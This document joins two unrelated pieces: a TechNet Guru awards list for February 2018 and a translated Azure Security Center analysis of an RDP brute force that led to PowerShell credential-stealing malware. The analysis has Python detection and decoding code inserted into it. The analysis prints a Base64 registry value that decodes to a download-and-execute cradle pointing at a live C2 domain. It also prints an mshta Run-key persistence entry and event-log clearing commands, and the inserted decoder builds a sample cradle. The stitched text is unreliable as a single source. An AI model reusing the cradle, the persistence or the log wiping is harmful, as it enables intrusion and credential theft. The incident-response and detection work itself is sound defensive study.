My fellow wiki ninjas will be digging deeper into some of these articles in this blog series, so watch out for those.

 

Any of our judges can exercise their right to veto an article, if they do not feel it meets minimum requirements for a medal.

When this is the case, we will at least give an indication of the reason, so you understand why.

 

A big thank you also to the other authors who did not make the top three of each category.

Some articles only just missed out, so we may be returning to discuss those too, in future blogs.

 

ASP.NET Technical Guru - February 2018
  • Gold Award Winner: ASP.NET Core 2.0: CRUD Operation With Entity Framework by AnkitSharma007
    Khanna Gaurav: "Nicely explained. Great article"
    Sabah Shariq: "Nice article with step by step explaining."
  • Silver Award Winner: Dependency Injection in ASP.NET Core 2.0 by SYED SHANU
    Jeff Fritz: "I would have liked to have seen more discussion of AddTransient and what that actually means. AddSingleton and AddScoped should have also been discussed"
    Khanna Gaurav: "Nice article"
    Sabah Shariq: "Good article."
  • Bronze Award Winner: ASP.NET Core 2.0: CRUD Operation With Razor Pages by AnkitSharma007
    Jeff Fritz: "No definition of CRUD, would have liked to have seen more Entity Framework usage in configuring the database schema"
    Khanna Gaurav: "Nicely explained. Great article"
    Sabah Shariq: "Nice article."

 

BizTalk Technical Guru - February 2018
  • Gold Award Winner: BizTalk: Sorting and Grouping Flat File Data In SQL…Instead of XSL by Johns-305
    JS: "Great new technique to address a long time frustration."
    Ed Price: "This article meets a big need. Great use and formatting of code and an image. Great to have a Gallery download link! Very well written."
  • Silver Award Winner: BizTalk : Analysis of Direct Mapping vs XDocument Pipeline vs Streaming Pipeline To Process Large Messages for SQL Bulk Insert by Mandar Dharmadhikari
    JS: "Very in-depth and informative."
    Ed Price: "Incredibly detailed with a lot of scripts and images! Great See Also and References sections!"
  • Bronze Award Winner: Playing with Persistence Points in Biztalk Orchestrations by F.Mondelo
    JS: "Always great to see ways to learn how BizTalk works internally."
    Ed Price: "Great use of scripts! I love the diagram in the Conclusion."

Also worth a mention were the other entries this month:

 

Forefront Identity Manager Technical Guru - February 2018
  • Gold Award Winner: MIM 2016 Troubleshooting: no-start-bad-ma-configuration by Peter Geelen
    AM: "Peter, thank you for your contribution. This is a helpful troubleshooting guide for FIM Service MA issues."
    Lasse Wedø: "Thanks"
    Ed Price: "Very clear. I love how this article includes the full error, root cause, and then how to go about solving it. Another great article from MVP Peter Geelen!"

 

Microsoft Azure Technical Guru - February 2018
  • Gold Award Winner: Channel Configuration - Azure Bot Service To Slack Application by RajeeshMenoth
    Dileepa Kariyawasam: "Very Well Written with a Good Structure."
    Tomaž Kaštrun: "Creating BOT service. And connecting it to Slack API with a simple test for a quick demo."
  • Silver Award Winner: Azure Cognitive Services - Bing Speech API and Language Understanding Intelligent Service (LUIS) by Chilberto
    Afzaal Ahmad Zeeshan: "Good write up with nice blend of visuals."
    Lasse Wedø: "Thanks"
    Dileepa Kariyawasam: "Good Article."
    Tomaž Kaštrun: "Quick introduction to LUIS - speech API and building a sample project."
  • Bronze Award Winner: Migrating WordPress Database from ClearDB to MySQL in Azure by Dave Rendón
    Tomaž Kaštrun: "If you find yourself doing migration of a WordPress database from ClearDB to Azure MySQL, you will find some tips in this example."
    Dileepa Kariyawasam: "Good Article. Needs bit of Improvement with structure etc."
    Afzaal Ahmad Zeeshan: "Very good"

Also worth a mention were the other entries this month:

 

Miscellaneous Technical Guru - February 2018
  • Gold Award Winner: Fun with Xamarin: Building a Simple Working Memory Game App with Web API and SignalR by Vincent Maverick Durano
    Ronen Ariely (aka pituach): "Another awesome article from Vincent! Highly recommended. I love step by step tutorials which bring real value to the reader. Well done!"
    Kia Zhi Tang: "Nice wiki. Enjoyed reading it with good referencing. Thank you for the contribution."
    Lasse Wedø: "A solid article, which would have been even better had it been written as several smaller articles, as a series."
  • Silver Award Winner: Unity3d - Using LUIS for voice activated commnd by Chilberto
    Ronen Ariely (aka pituach): "Great article and very interesting. Language Understanding Intelligent Service (LUIS) is a very hot topic today. The article is missing a "see also" section which can give the reader another value, but except this (which should be fixed) it is well formatted. Well done!"
    Kia Zhi Tang: "Thank you for sharing the concept."
  • Bronze Award Winner: Quantum Computing: An Introduction by AnkitSharma007
    Lasse Wedø: "A great introduction at a high level, I would have liked to see this post as two posts. One for the great intro, and one for creating the first code."
    Ronen Ariely (aka pituach): "Great article! Very interesting topic and well written. Perfectly formatted. Well done! It is very hard to rank this category this month as all the articles are really high quality. Unfortunately, we must vote and only one can be in each position."
    Kia Zhi Tang: "Thank you for sharing the informative content"

 

SharePoint Technical Guru - February 2018
  • Gold Award Winner: SharePoint framework aka SPFx with CKeditor5, PnP JS, OfficeUIFabric PeoplePicker and much more by Ramakrishnan Raman
    Roman Nedzelsky, MVP: "very nice article, steps explained, good pictures, really good job"
    John Naguib: "Very nice, thanks for sharing, SPFx is important"
  • Silver Award Winner: Create email validation column in a list without code by Siva Padala
    John Naguib: "Thanks for sharing"
    Roman Nedzelsky, MVP: "useful information, nice work"
    Tiago Costa: "Simple but interesting article."
  • Bronze Award Winner: Error Logging in Provider hosted add-in using Log4Net by Ramakrishnan Raman
    John Naguib: "Well done, logging is important topic"
    Roman Nedzelsky, MVP: "nice article, really good job"

Also worth a mention were the other entries this month:

 

SQL Server General and Database Engine Technical Guru - February 2018
  • Gold Award Winner: MSSQL backup error and solutions by AV111
    Manoj Pandey: "I would say this is a nice collection of frequently happening issues/errors with most DBAs and would help people like me who rarely work on the admin side."
    Ronen Ariely (aka pituach): "Very good article. Well written and well formatted. Important topic that can be very useful. There is one thing that is missing, which is a closer to the article. You cannot leave the reader "in the air". We need a closer like conclusions or a summary and so on. Well done!"
  • Silver Award Winner: SQL Server: A severe error occurred on rebuilding an index by fzb
    Manoj Pandey: "Nice tip!"
    Ronen Ariely (aka pituach): "Thanks for sharing, but this is not an article but a short post without any structure. An article needs to have a beginning (like an introduction) and an ending (like conclusions) and must be formatted according to the interface rules. An article needs to have a table of contents and a "see also" section. The content is short and might be a base for a good article with a bit more work."

 

Transact-SQL Technical Guru - February 2018
  • Gold Award Winner: SQL Server 2016: Dynamic Data Masking by AV111
    Manoj Pandey: "Nice write up with good examples featuring all modes of masking."
    Richard Mueller: "Very interesting. Should prove useful in many situations. Thanks."
    Ronen Ariely (aka pituach): "Nice article, but duplicate topic. There is already an article on this topic: https://social.technet.microsoft.com/wiki/contents/articles/31419.database-engine-dynamic-data-masking.aspx The first step in adding a new article should be to search for existing articles. The basic idea of Wiki is that anyone can edit and improve existing articles if needed and not create another one."

 

Visual Basic Technical Guru - February 2018
  • Gold Award Winner: Defensive data programming part 1 by Karen Payne
    SYEDSHANU: "Great Post and good to see the Source code with detailed explanation."
    Khanna Gaurav: "Very useful extensions"
    Ed Price: "This is a powerful and lofty topic. It's also great to have a link to the source code on the MSDN Gallery. Thanks, Karen! It could be improved with more of an explanation of the code, as well as See Also (Wiki links) and References (external links) sections at the end."
  • Silver Award Winner: VB.Net - Tetris.Net by .paul.
    SYEDSHANU: "Nice post. It will be good to add a detailed description for the code part, like, for example, breaking down the code with more explanation of each method with why and how the code has been used."
    Ed Price: "Great overview and a fun sample! Also good to have the source code link! It could be improved with more of an explanation of the code."

 

Visual C# Technical Guru - February 2018
  • Gold Award Winner: An Overview to Understand Equality in .NET by Ehsan Sajjad
    Khanna Gaurav: "Great article"
    Jaliya Udagedara: "Great article on a very interesting topic. Well explained with examples."
    Afzaal Ahmad Zeeshan: "Good write up."
  • Silver Award Winner: Text to Speech using Cognitive Service Speech API C# by SYED SHANU
    Afzaal Ahmad Zeeshan: "Clean write up with good visuals, nice post Shanu!"
    Jaliya Udagedara: "Nice article to get you started on Bing Speech API with sample code. Cool!"
    Khanna Gaurav: "Nice article"
  • Bronze Award Winner: C#: Understanding Basics of DateTime and TimeSpan with an Example: Finding Working Day Difference Between Two Dates Based on Weekend And Bank Holidays by Somdip Dey - MSP Alumnus
    Khanna Gaurav: "DateTime & TimeSpan nicely explained"
    Jaliya Udagedara: "Good article with sample code."

Also worth a mention were the other entries this month:

  • C# : Implementing a Linked List by AnkitSharma007
    Jaliya Udagedara: "Good explanation on implementing Linked Lists using C#."
    Khanna Gaurav: "Good one to learn linked list"
  • C# - Tetris.Net by .paul.
    Khanna Gaurav: "Great article to learn Windows Form and developing game"
    Afzaal Ahmad Zeeshan: "A great article, as always, but Paul do try to explain as well, code dumps are not useful most of the times; consider MSDN Gallery for code samples."
    Jaliya Udagedara: "Would have been great if the code is described."
  • Windows DataGridView with inline edit and remove buttons by Karen Payne
    Jaliya Udagedara: "Nice article with complete source code. Isn't it great."
    Khanna Gaurav: "Should be useful for developer using dataGridView"
  • How to create a shared library by Karen Payne
    Jaliya Udagedara: "Good article. Maybe we can change the article title to be more aligned with the content?"

 

Wiki and Portals Technical Guru - February 2018
  • Gold Award Winner: TechNet Wiki - Top Contributors Awards by Rajeesh Menoth
    Richard Mueller: "An excellent way to recognize TechNet Wiki Gurus. Thanks."
    Ronen Ariely (aka pituach): "Nice statistics. Can be very useful if it will be updated regularly. Thanks for sharing and for the hard work in collecting the statistics. Well done!"
    Kia Zhi Tang: "Thank you for the work"

 

Windows PowerShell Technical Guru - February 2018
  • Gold Award Winner: Exchange Server Monitoring Event Logs Status Report in Daily Email Notification by H Shakir
    Joseph Moody: "Good tool! Thank you for writing this one as well."
    Adam Fowler: "Thanks for submitting. There's some spacing issues in the first code example, and I think a daily list of logs would be more valuable than the last 10, but it's a good example of what's possible."
    Richard Mueller: "Good use of Wiki guidelines. A great idea to keep admins informed of Exchange Server issues. Are the two file names consistent in the article?"
    Kia Zhi Tang: "Thank you for sharing."

 

Windows Server Technical Guru - February 2018
  • Gold Award Winner: Active Directory Replication Metadata by Subhro Majumder
    Mark Parris: "Good insights into on-premises AD Replication, should be understood by all Active Directory admins."
    Afzaal Ahmad Zeeshan: "A great write up for anyone to read and understand, explanation was clean."
    Joseph Moody: "Awesome write up showing some of the things few admins get to see!"
    Richard Mueller: "Excellent steps to monitor AD replication. Good use of Wiki guidelines. Good explanation of linked and non-replicating attributes."
    Kia Zhi Tang: "Thank you for sharing. Enjoy reading with good referencing."
  • Silver Award Winner: Windows Server 2016: DHCP by H Shakir
    Mark Parris: "Graphical instructions on how to install a DHCP server, would be nice to see the command line syntax."
    Joseph Moody: "Very good article! I think your headings are a bit off though - other than that, it was great to read."
    Richard Mueller: "Detailed step by step instructions with images to setup and configure DHCP."
    Kia Zhi Tang: "Thank you for sharing the DHCP role installation walkthrough."

 

A huge thank you to EVERYONE who contributed an article to last month's competition.

 

Best regards,
Pete Laker

 

More about the TechNet Guru Awards:

How Azure Security Center unveils suspicious PowerShell attacks

By Cloud Security Investigations & Intelligence - Microsoft Azure Security

In honor of National Cyber Security Awareness Month (NCSAM), we are publishing a new post in this series that focuses on real attacks detected, investigated and mitigated by Azure Security Center. This post is about an attack that used PowerShell to run malicious code and collect user credentials. Before we begin, here is a recap of the other posts in the series, in which Security Center detected:

In this post we cover another interesting real-world attack scenario that was discovered by Azure Security Center and investigated by our team. The affected company's name, all computer names and all user names have been changed to protect privacy. This particular attack used PowerShell to run malicious code in memory, with the goal of collecting credential information through password theft, keylogging, clipboard grabbing and screen capture. We walk through the chain of events, which started with an RDP brute force attack and led to a persistent auto-start entry (ASEP) being set up and configured in the registry. This case study offers in-depth insight into the dynamics of the attack, together with recommendations on how to detect and prevent similar attacks in your environment.

Initial Azure Security Center alerts and details

For as long as remote administration of Internet-connected computers has existed, attackers have kept working to discover remote management services such as Remote Desktop Protocol (RDP) so that they can crack passwords with brute force attacks. Our case begins in the customer's Azure Security Center console, which raised alerts for RDP brute force activity as well as for suspicious PowerShell activity.

In the Azure Security Center screenshot below you can follow the chronological progression from bottom to top: a "Failed RDP brute force attack" alert is followed by a "Successful RDP brute force attack" alert, indicating that someone guessed a user's password over RDP. This malicious brute-force logon is then followed by several alerts about anomalous PowerShell activity.

[Screenshot 1]

Looking into the initial Successful RDP brute force attack alert, we see the time of the attack, the account that was attacked, the IP address the attempts originated from (Italy, in our case) and a link to the Microsoft Threat Intelligence "RDP Brute Forcing" report.

[Screenshot 2]

After the successful logon, when we drill into the high-severity alert page, Azure Security Center shows in chronological order every command line the attacker launched after logging on:

[Screenshot 3]

Initial compromise and details of attacker activity

Using the information provided by the alerts, our investigation team worked with the customer to examine the account logon logs (event ID 4624) and process creation logs (event ID 4688) from the attacker's initial logon onward. In the earliest logon data we see continuous RDP brute force attempts using various user name and password combinations. Most of these failed attempts resulted in event ID 4625 (an account failed to log on) with status code 0xc000006d (the attempted logon is invalid) and substatus code 0xc0000064 (the specified account does not exist).

[Screenshot 4]

At around 10:13 AM on 09-06 we begin to see the substatus code change. The user name "ContosoAdmin" now produces a different substatus code: 0xc000006a (wrong password). This is followed by a successful logon with the "ContosoAdmin" account, with logon type 3 and then logon type 10 (RemoteInteractive). The logon appears to originate from an IP address in Italy (188.125.100.233).

[Screenshot 5]
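The 4625/4624 correlation described above, written out as an added example that is not part of the original post: it flags a source address that reaches a threshold of failed logons inside a time window, and escalates when a type-10 (RemoteInteractive) logon from the same source follows. The events are constructed sample data; the threshold, the window and the documentation IP ranges (203.0.113.0/24, 192.0.2.0/24) are assumptions.

```python
"""Correlate Windows Security events 4625 and 4624 to flag an RDP brute force
that ends in a successful logon, the pattern Security Center alerted on above.
Added example with constructed sample events; not from the original post."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import NamedTuple


class Event(NamedTuple):
    time: datetime
    event_id: int      # 4625 = failed logon, 4624 = successful logon
    source_ip: str
    account: str
    logon_type: int    # 10 = RemoteInteractive (RDP), 3 = Network
    status: str        # e.g. 0xC000006D for a failed logon
    substatus: str     # 0xC0000064 = no such account, 0xC000006A = wrong password


def build_sample_events():
    """CONSTRUCTED sample: a spray of bad user names, three wrong-password
    attempts against an existing account, then a type-10 logon from the same
    source. 203.0.113.0/24 and 192.0.2.0/24 are documentation ranges."""
    base = datetime(2017, 9, 6, 10, 5)
    attacker, events = "203.0.113.7", []
    names = ["admin", "administrator", "test", "backup", "sqlsvc", "guest"] * 2
    for i, name in enumerate(names):
        events.append(Event(base + timedelta(seconds=20 * i), 4625, attacker,
                            name, 10, "0xC000006D", "0xC0000064"))
    for i in range(3):
        events.append(Event(base + timedelta(minutes=8, seconds=15 * i), 4625,
                            attacker, "ContosoAdmin", 10, "0xC000006D", "0xC000006A"))
    events.append(Event(base + timedelta(minutes=8, seconds=50), 4624, attacker,
                        "ContosoAdmin", 10, "0x0", "0x0"))
    # A legitimate admin RDP session from a different address: no alert expected.
    events.append(Event(base + timedelta(minutes=9), 4624, "192.0.2.10",
                        "jdoe", 10, "0x0", "0x0"))
    return events


def detect_rdp_brute_force(events, window=timedelta(minutes=15), threshold=10):
    """Return alerts: one 'failed_rdp_brute_force' when a source reaches
    `threshold` failed logons inside `window`, and one
    'successful_rdp_brute_force' when a type-10 logon from that source follows
    while the window is still populated."""
    by_ip = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.time):
        by_ip[ev.source_ip].append(ev)
    alerts = []
    for ip, evs in by_ip.items():
        recent = []  # failed logons from this source inside the sliding window
        for ev in evs:
            recent = [f for f in recent if ev.time - f.time <= window]
            if ev.event_id == 4625:
                recent.append(ev)
                if len(recent) == threshold:
                    alerts.append({"type": "failed_rdp_brute_force", "source_ip": ip,
                                   "first_seen": recent[0].time, "attempts": len(recent),
                                   "accounts": sorted({f.account for f in recent})})
            elif ev.event_id == 4624 and ev.logon_type == 10 and len(recent) >= threshold:
                wrong_pw = sum(1 for f in recent if f.account == ev.account
                               and f.substatus.upper() == "0XC000006A")
                alerts.append({"type": "successful_rdp_brute_force", "source_ip": ip,
                               "account": ev.account, "time": ev.time,
                               "prior_failures": len(recent),
                               "wrong_password_attempts": wrong_pw})
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_brute_force(build_sample_events()):
        print(alert)
```

Counting wrong-password (0xC000006A) failures against the account that finally logged on is what separates a guessed password from a coincidental legitimate logon after a spray of bad user names; a real deployment would read the fields from the 4625/4624 XML rather than from tuples.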

Looking at the process creation activity after the logon, the attacker first issued a "whoami" command, which shows the identity of the currently logged-on user. They then used the "net group "Domain Admins" /domain" command to list the members of the "Domain Admins" group. This was immediately followed by the "qwinsta" command, which displays all Remote Desktop Services sessions. Taskmgr (Windows Task Manager) was then launched to view or manage processes and services.

[Screenshot 6]

About a minute later, another PowerShell command was executed. This command was obfuscated with Base64-encoded strings that were additionally wrapped in the Deflate compression algorithm.

Note: we will dig into what this command does when we decode the Base64 later in this post.

[Screenshot 7]

About 3 minutes later the attacker logged off the machine. Before logging off, however, they attempted to cover their tracks by clearing all event logs. This was done with the built-in wevtutil.exe (Windows Events Command Line Utility). First, all event logs were enumerated with the "el" or "enum-logs" switch. Then all event logs were cleared with the "cl" or "clear-log" switch. Below is part of the event-clearing commands the attacker launched.

[Screenshot 8]

 

A closer look at the Base64-encoded PowerShell command

Decoding the Base64-encoded portion of the attacker's initial command reveals further Base64-encoded commands, which show:

  • Nested Base64 obfuscation.
  • Command execution is obfuscated at every level.
  • A registry-only ASEP (Auto-Start Extensibility Point) is created as the persistence mechanism.
  • The parameters of the malicious code are stored in the registry.
  • Because the ASEP and the parameters exist only in the system registry, command execution happens "in memory", leaving no file or NTFS artifacts.

This is the initial command issued by the attacker:

[Screenshot 9]

Decoding the Base64 reveals the registry entries and further Base64 strings to decode...

[Screenshot 10]

Decoding these nested Base64 values, we determined that the command does the following:

  • The command first stores parameter information, to be read by later commands, in a registry value named "SeCert" under HKLM\Software\Microsoft\Windows\CurrentVersion.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion]
"SeCert"="dwBoAGkAbABlACgAMQApAHsAdAByAHkAewBJAEUAWAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AbQBkAG0AcwBlAHIAdgBlAHIAcwAuAGMAbwBtAC8AJwArACgAWwBjAGgAYQByAF0AKAA4ADUALQAoAC0AMwA3ACkAKQApACkAfQBjAGEAdABjAGgAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAfQB9AA=="

  • The Base64 value in the registry above decodes to a download instruction pointing at the malicious C2 (command-and-control) domain (mdmservers[.]com).

while(1){try{IEX(New-Object Net.WebClient).DownloadString('hxxp[:]//mdmservers[.]com/'+([char](85-(-37))))}catch{Start-Sleep -s 10}}

  • The attacker's command then creates a persistence mechanism through a registry ASEP (Auto-Start Extensibility Point) named "SophosMSHTA" under the "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" key.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SophosMSHTA"="mshta vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -c ""$x=$((gp HKLM:Software\Microsoft\Windows\CurrentVersion SeCert).SeCert);powershell -E $x""",0,True)(window.close)"

  • The registry persistence ensures that the malicious instruction runs every time the computer boots or restarts.
  • The registry ASEP launches the Microsoft script engine (mshta.exe).
  • Mshta.exe in turn runs PowerShell.exe, which reads and decodes the value of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion -> "SeCert".
  • The SeCert registry value tells PowerShell to download and launch the malicious script from 'hxxp[:]//mdmservers[.]com'.
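A defender-side decoder for the nesting just described, as an added example that is not code from the original post: it peels Base64/UTF-16LE and Base64/raw-Deflate layers from a command line and scans every layer for the indicators this post calls out (IEX with DownloadString, Net.WebClient, an mshta launcher, a Run-key ASEP, wevtutil clear-log). The sample command is constructed and points at the placeholder host example.invalid; the indicator names and regular expressions are my assumptions about what to match.

```python
"""Peel the nested encoding layers of a PowerShell command line (Base64 ->
UTF-16LE text, Base64 -> raw Deflate -> text) and flag the indicators this
post describes. Added example, not code from the original post; the sample
command is constructed and example.invalid is a placeholder host."""
import base64
import re
import zlib

# Indicators called out above (plus the -EncodedCommand switch itself); assumed set.
INDICATORS = {
    "encoded_command": re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"),
    "iex_download": re.compile(r"(?i)\bIEX\b.*DownloadString"),
    "webclient": re.compile(r"(?i)Net\.WebClient"),
    "run_key_asep": re.compile(r"(?i)CurrentVersion\\Run\b"),
    "mshta": re.compile(r"(?i)\bmshta(?:\.exe)?\b"),
    "wevtutil_clear": re.compile(r"(?i)\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\b"),
}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def _as_text(raw: bytes):
    """Decode bytes as UTF-16LE (what -EncodedCommand expects) or UTF-8;
    return None if the result is not printable text."""
    utf16_like = len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4
    try:
        text = raw.decode("utf-16-le" if utf16_like else "utf-8")
    except UnicodeDecodeError:
        return None
    return text if all(c.isprintable() or c in "\r\n\t" for c in text) else None


def decode_layer(token: str):
    """Base64-decode one token; if the bytes are not text, try raw Deflate
    (no zlib header), which is what IO.Compression.DeflateStream produces."""
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:
        return None
    text = _as_text(raw)
    if text is not None:
        return text
    try:
        return _as_text(zlib.decompress(raw, -15))
    except zlib.error:
        return None


def peel(command: str, max_depth: int = 6):
    """Return the decoding layers, outermost first."""
    layers, frontier = [command], [command]
    for _ in range(max_depth):
        found = []
        for text in frontier:
            for token in B64_TOKEN.findall(text):
                decoded = decode_layer(token)
                if decoded and decoded not in layers:
                    layers.append(decoded)
                    found.append(decoded)
        if not found:
            break
        frontier = found
    return layers


def analyse(command: str):
    """Decode every layer and report which indicators fire in any of them."""
    layers = peel(command)
    hits = sorted({name for layer in layers
                   for name, rx in INDICATORS.items() if rx.search(layer)})
    return {"layers": layers, "indicators": hits}


def build_sample() -> str:
    """CONSTRUCTED sample with the same nesting as the post's command: a
    Deflate+Base64 inner script inside a Base64/UTF-16LE -EncodedCommand."""
    inner = ("while(1){try{IEX(New-Object Net.WebClient).DownloadString("
             "'http://example.invalid/p')}catch{Start-Sleep -s 10}}")
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # raw Deflate, no zlib header
    deflated = base64.b64encode(comp.compress(inner.encode()) + comp.flush()).decode()
    loader = ("IEX(New-Object IO.StreamReader((New-Object IO.Compression.DeflateStream("
              "[IO.MemoryStream][Convert]::FromBase64String('" + deflated + "'),"
              "[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()")
    return "powershell.exe -NoP -W Hidden -E " + base64.b64encode(loader.encode("utf-16-le")).decode()


if __name__ == "__main__":
    report = analyse(build_sample())
    for depth, layer in enumerate(report["layers"]):
        print(f"layer {depth}: {layer[:80]}")
    print("indicators:", report["indicators"])
```

Scanning every decoded layer, not only the outermost command line, is the point: in this case the IEX/DownloadString pattern only appears two layers down, after the UTF-16LE and Deflate wrappers have been removed.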

Download and execution of the malicious code

Once the attacker had set up the persistence mechanism and logged off, the next restart of the host launched PowerShell, which downloaded and launched the malicious payload from 'hxxp[:]//mdmservers[.]com'. This malicious script contains several sections that each perform a specific function. The following details the main functions of the malicious payload:

Operation
  • Captures the contents of the clipboard and saves the output to the following location: %TEMP%\Applnsights_VisualStudio.txt
  • Captures all keystrokes to the following location: %TEMP%\key.log
  • Takes an initial screenshot and saves the .jpg to the following location: %TEMP%\39F28DD9-0677-4EAC-91B8-2112B1515341\yyyymmdd_hhmmss.jpg
  • Takes a subsequent screenshot whenever certain finance- or account-credential-related keywords are typed, and saves the .jpg to the following location: %TEMP%\39F28DD9-0677-4EAC-91B8-2112B1515341\yyyymmdd_hhmmss.jpg
  • Checks whether Google Chrome is installed. If so, collects all passwords from the Chrome cache and saves them to the following location: %TEMP%\Chrome.log
  • Checks whether Mozilla Firefox is installed. If so, collects all passwords from the Firefox cache and saves them to the following location: %TEMP%\Firefox.log

 

In summary

So, let's summarize what we have seen so far in the investigation:

  1. Initial entry occurred when an administrator account was compromised in a successful RDP brute force attack.
  2. The attacker then executed a Base64-obfuscated PowerShell command that set up a registry ASEP to launch at startup.
  3. The attacker then cleared the evidence of their activity by deleting all event logs with the command: wevtutil.exe -cl <eventlogname>.
  4. When the affected host boots or restarts, it launches the malicious registry ASEP in HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
  5. The registry ASEP launches the Microsoft script engine (mshta.exe).
  6. Mshta.exe in turn runs PowerShell.exe, which reads and decodes the value of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion -> "SeCert".
  7. The "SeCert" registry value tells PowerShell to download and launch the malicious script from 'hxxp[:]//mdmservers[.]com'.
  8. The malicious code from hxxp[:]//mdmservers[.]com then does the following:
  • Captures the contents of the clipboard to: %temp%\Applnsights_VisualStudio.txt
  • Captures all keystrokes to: %temp%\key.log
  • Takes an initial screenshot and saves the .jpg to: %temp%\39F28DD9-0677-4EAC-91B8-2112B1515341\yyyymmdd_hhmmss.jpg
  • Takes a subsequent screenshot whenever certain finance- or account-credential-related keywords are typed, and saves the .jpg to: %temp%\39F28DD9-0677-4EAC-91B8-2112B1515341\yyyymmdd_hhmmss.jpg
  • Checks whether Google Chrome is installed. If so, collects all passwords from the Chrome cache and saves them to: %temp%\Chrome.log
  • Checks whether Mozilla Firefox is installed. If so, collects all passwords from the Firefox cache and saves them to: %temp%\Firefox.log

The result of this attack is an information-stealing piece of malware that auto-starts from the registry, runs in memory, and harvests keystrokes, browser passwords, clipboard data and screenshots.

How Azure Security Center caught it all

Clearly the attacker went to special lengths to hide their activity: making sure all process execution used built-in Windows executables (PowerShell.exe, Mshta.exe, Wevtutil.exe), using obfuscated command parameters stored in the registry, and deleting all event logs to clear their tracks. None of this effort, however, stopped Azure Security Center from detecting, collecting and reporting the malicious activity.

As we saw at the start of this post, Azure Security Center detected every stage of this attack, providing details of the initial RDP brute force attack and revealing every command the attacker issued at each stage. You will also notice in the alerts that, at every stage of the attack, all obfuscated command lines were deciphered, decoded and shown in clear text. This invaluable and time-saving information helps security response investigators and system administrators answer questions such as "What happened?", "When did it happen?", "How did they get in?", "What did they do once inside?" and "Where did they come from?". Investigators can also determine whether other hosts in the organization may have been compromised through lateral movement from this compromised host. Seeing the big picture of the attack can also help answer questions of motive, such as "What were they after?". In our case, the primary goal appears to have been credential theft aimed at money or intellectual property.

In all of our investigations, Azure Security Center has played a key role in helping determine critical details such as the initial intrusion/attack vector, the source of the attack, possible lateral movement and the scope of the attack. Security Center also preserves details of artifacts that might otherwise be lost over time because of file-system overwrites or log retention/storage limits. Using the latest machine learning and big data analytics, Azure Security Center can acquire, store, analyze and decipher data from a wide range of sources, making it an invaluable resource for security analysts, incident responders, lawyers and other professionals.

  • Password policy: Attackers typically launch brute force attacks with widely available tools that use word lists and smart rule sets to guess user passwords automatically. The first step, therefore, is to make sure complex passwords are used for all virtual machines. A strong password policy should also enforce frequent password changes. Learn more about best practices for enforcing password policies.
  • Endpoints: Endpoints allow communication with your virtual machine from the Internet. When a virtual machine is created in the Azure environment, two endpoints are created by default to help manage the VM: Remote Desktop and PowerShell. It is recommended to remove any endpoints that are not needed and to add them only when required. If you do have endpoints open, it is recommended to change the public port used wherever possible. When creating a new Windows VM, the public port for Remote Desktop is set to "Auto" by default, which means a random public port is generated for you automatically. Get more information here on how to set up endpoints on a classic Windows virtual machine in Azure.
  • Enable Network Security Groups: Azure Security Center recommends that you enable Network Security Groups (NSGs) if they are not already enabled. An NSG contains a list of Access Control List (ACL) rules that allow or deny network traffic to VM instances in a virtual network. Endpoint ACLs let you control which IP addresses or CIDR subnets are allowed access over that management protocol. Learn more about how to filter network traffic with network security groups and how to enable network security groups in Azure Security Center.
  • Use a VPN for management: A VPN gateway is a type of virtual network gateway that sends encrypted traffic to an on-premises location across a public connection. You can also use a VPN gateway to send encrypted traffic between Azure virtual networks over the Microsoft network. To send encrypted network traffic between your Azure virtual network and your on-premises site, you must create a VPN gateway for your virtual network. Site-to-site and point-to-site gateway connections let us remove public endpoints entirely and connect directly to the virtual machine over a secure VPN connection.
  • Network Level Authentication (NLA): NLA can be used on hosts so that only domain-authenticated users can create Remote Desktop sessions. Because NLA requires the connecting user to authenticate before a session with the server is established, brute force, dictionary and password-guessing attacks can be mitigated.
  • Just-in-time (JIT) network access: Just-in-time virtual machine (VM) access in Azure Security Center can be used to help protect and lock down inbound traffic to Azure virtual machines. JIT network access reduces exposure to brute force attacks by limiting the time ports are open, which reduces the risk of attack while still providing easy access to connect to VMs when needed.

Additional resources

The PowerShell team has done a tremendous amount of work to make PowerShell the most secure and transparent scripting language. The links below discuss in detail how to address PowerShell concerns:

For more information on the malicious script and its output, see the following:

To learn more about Azure Security Center, see the following:
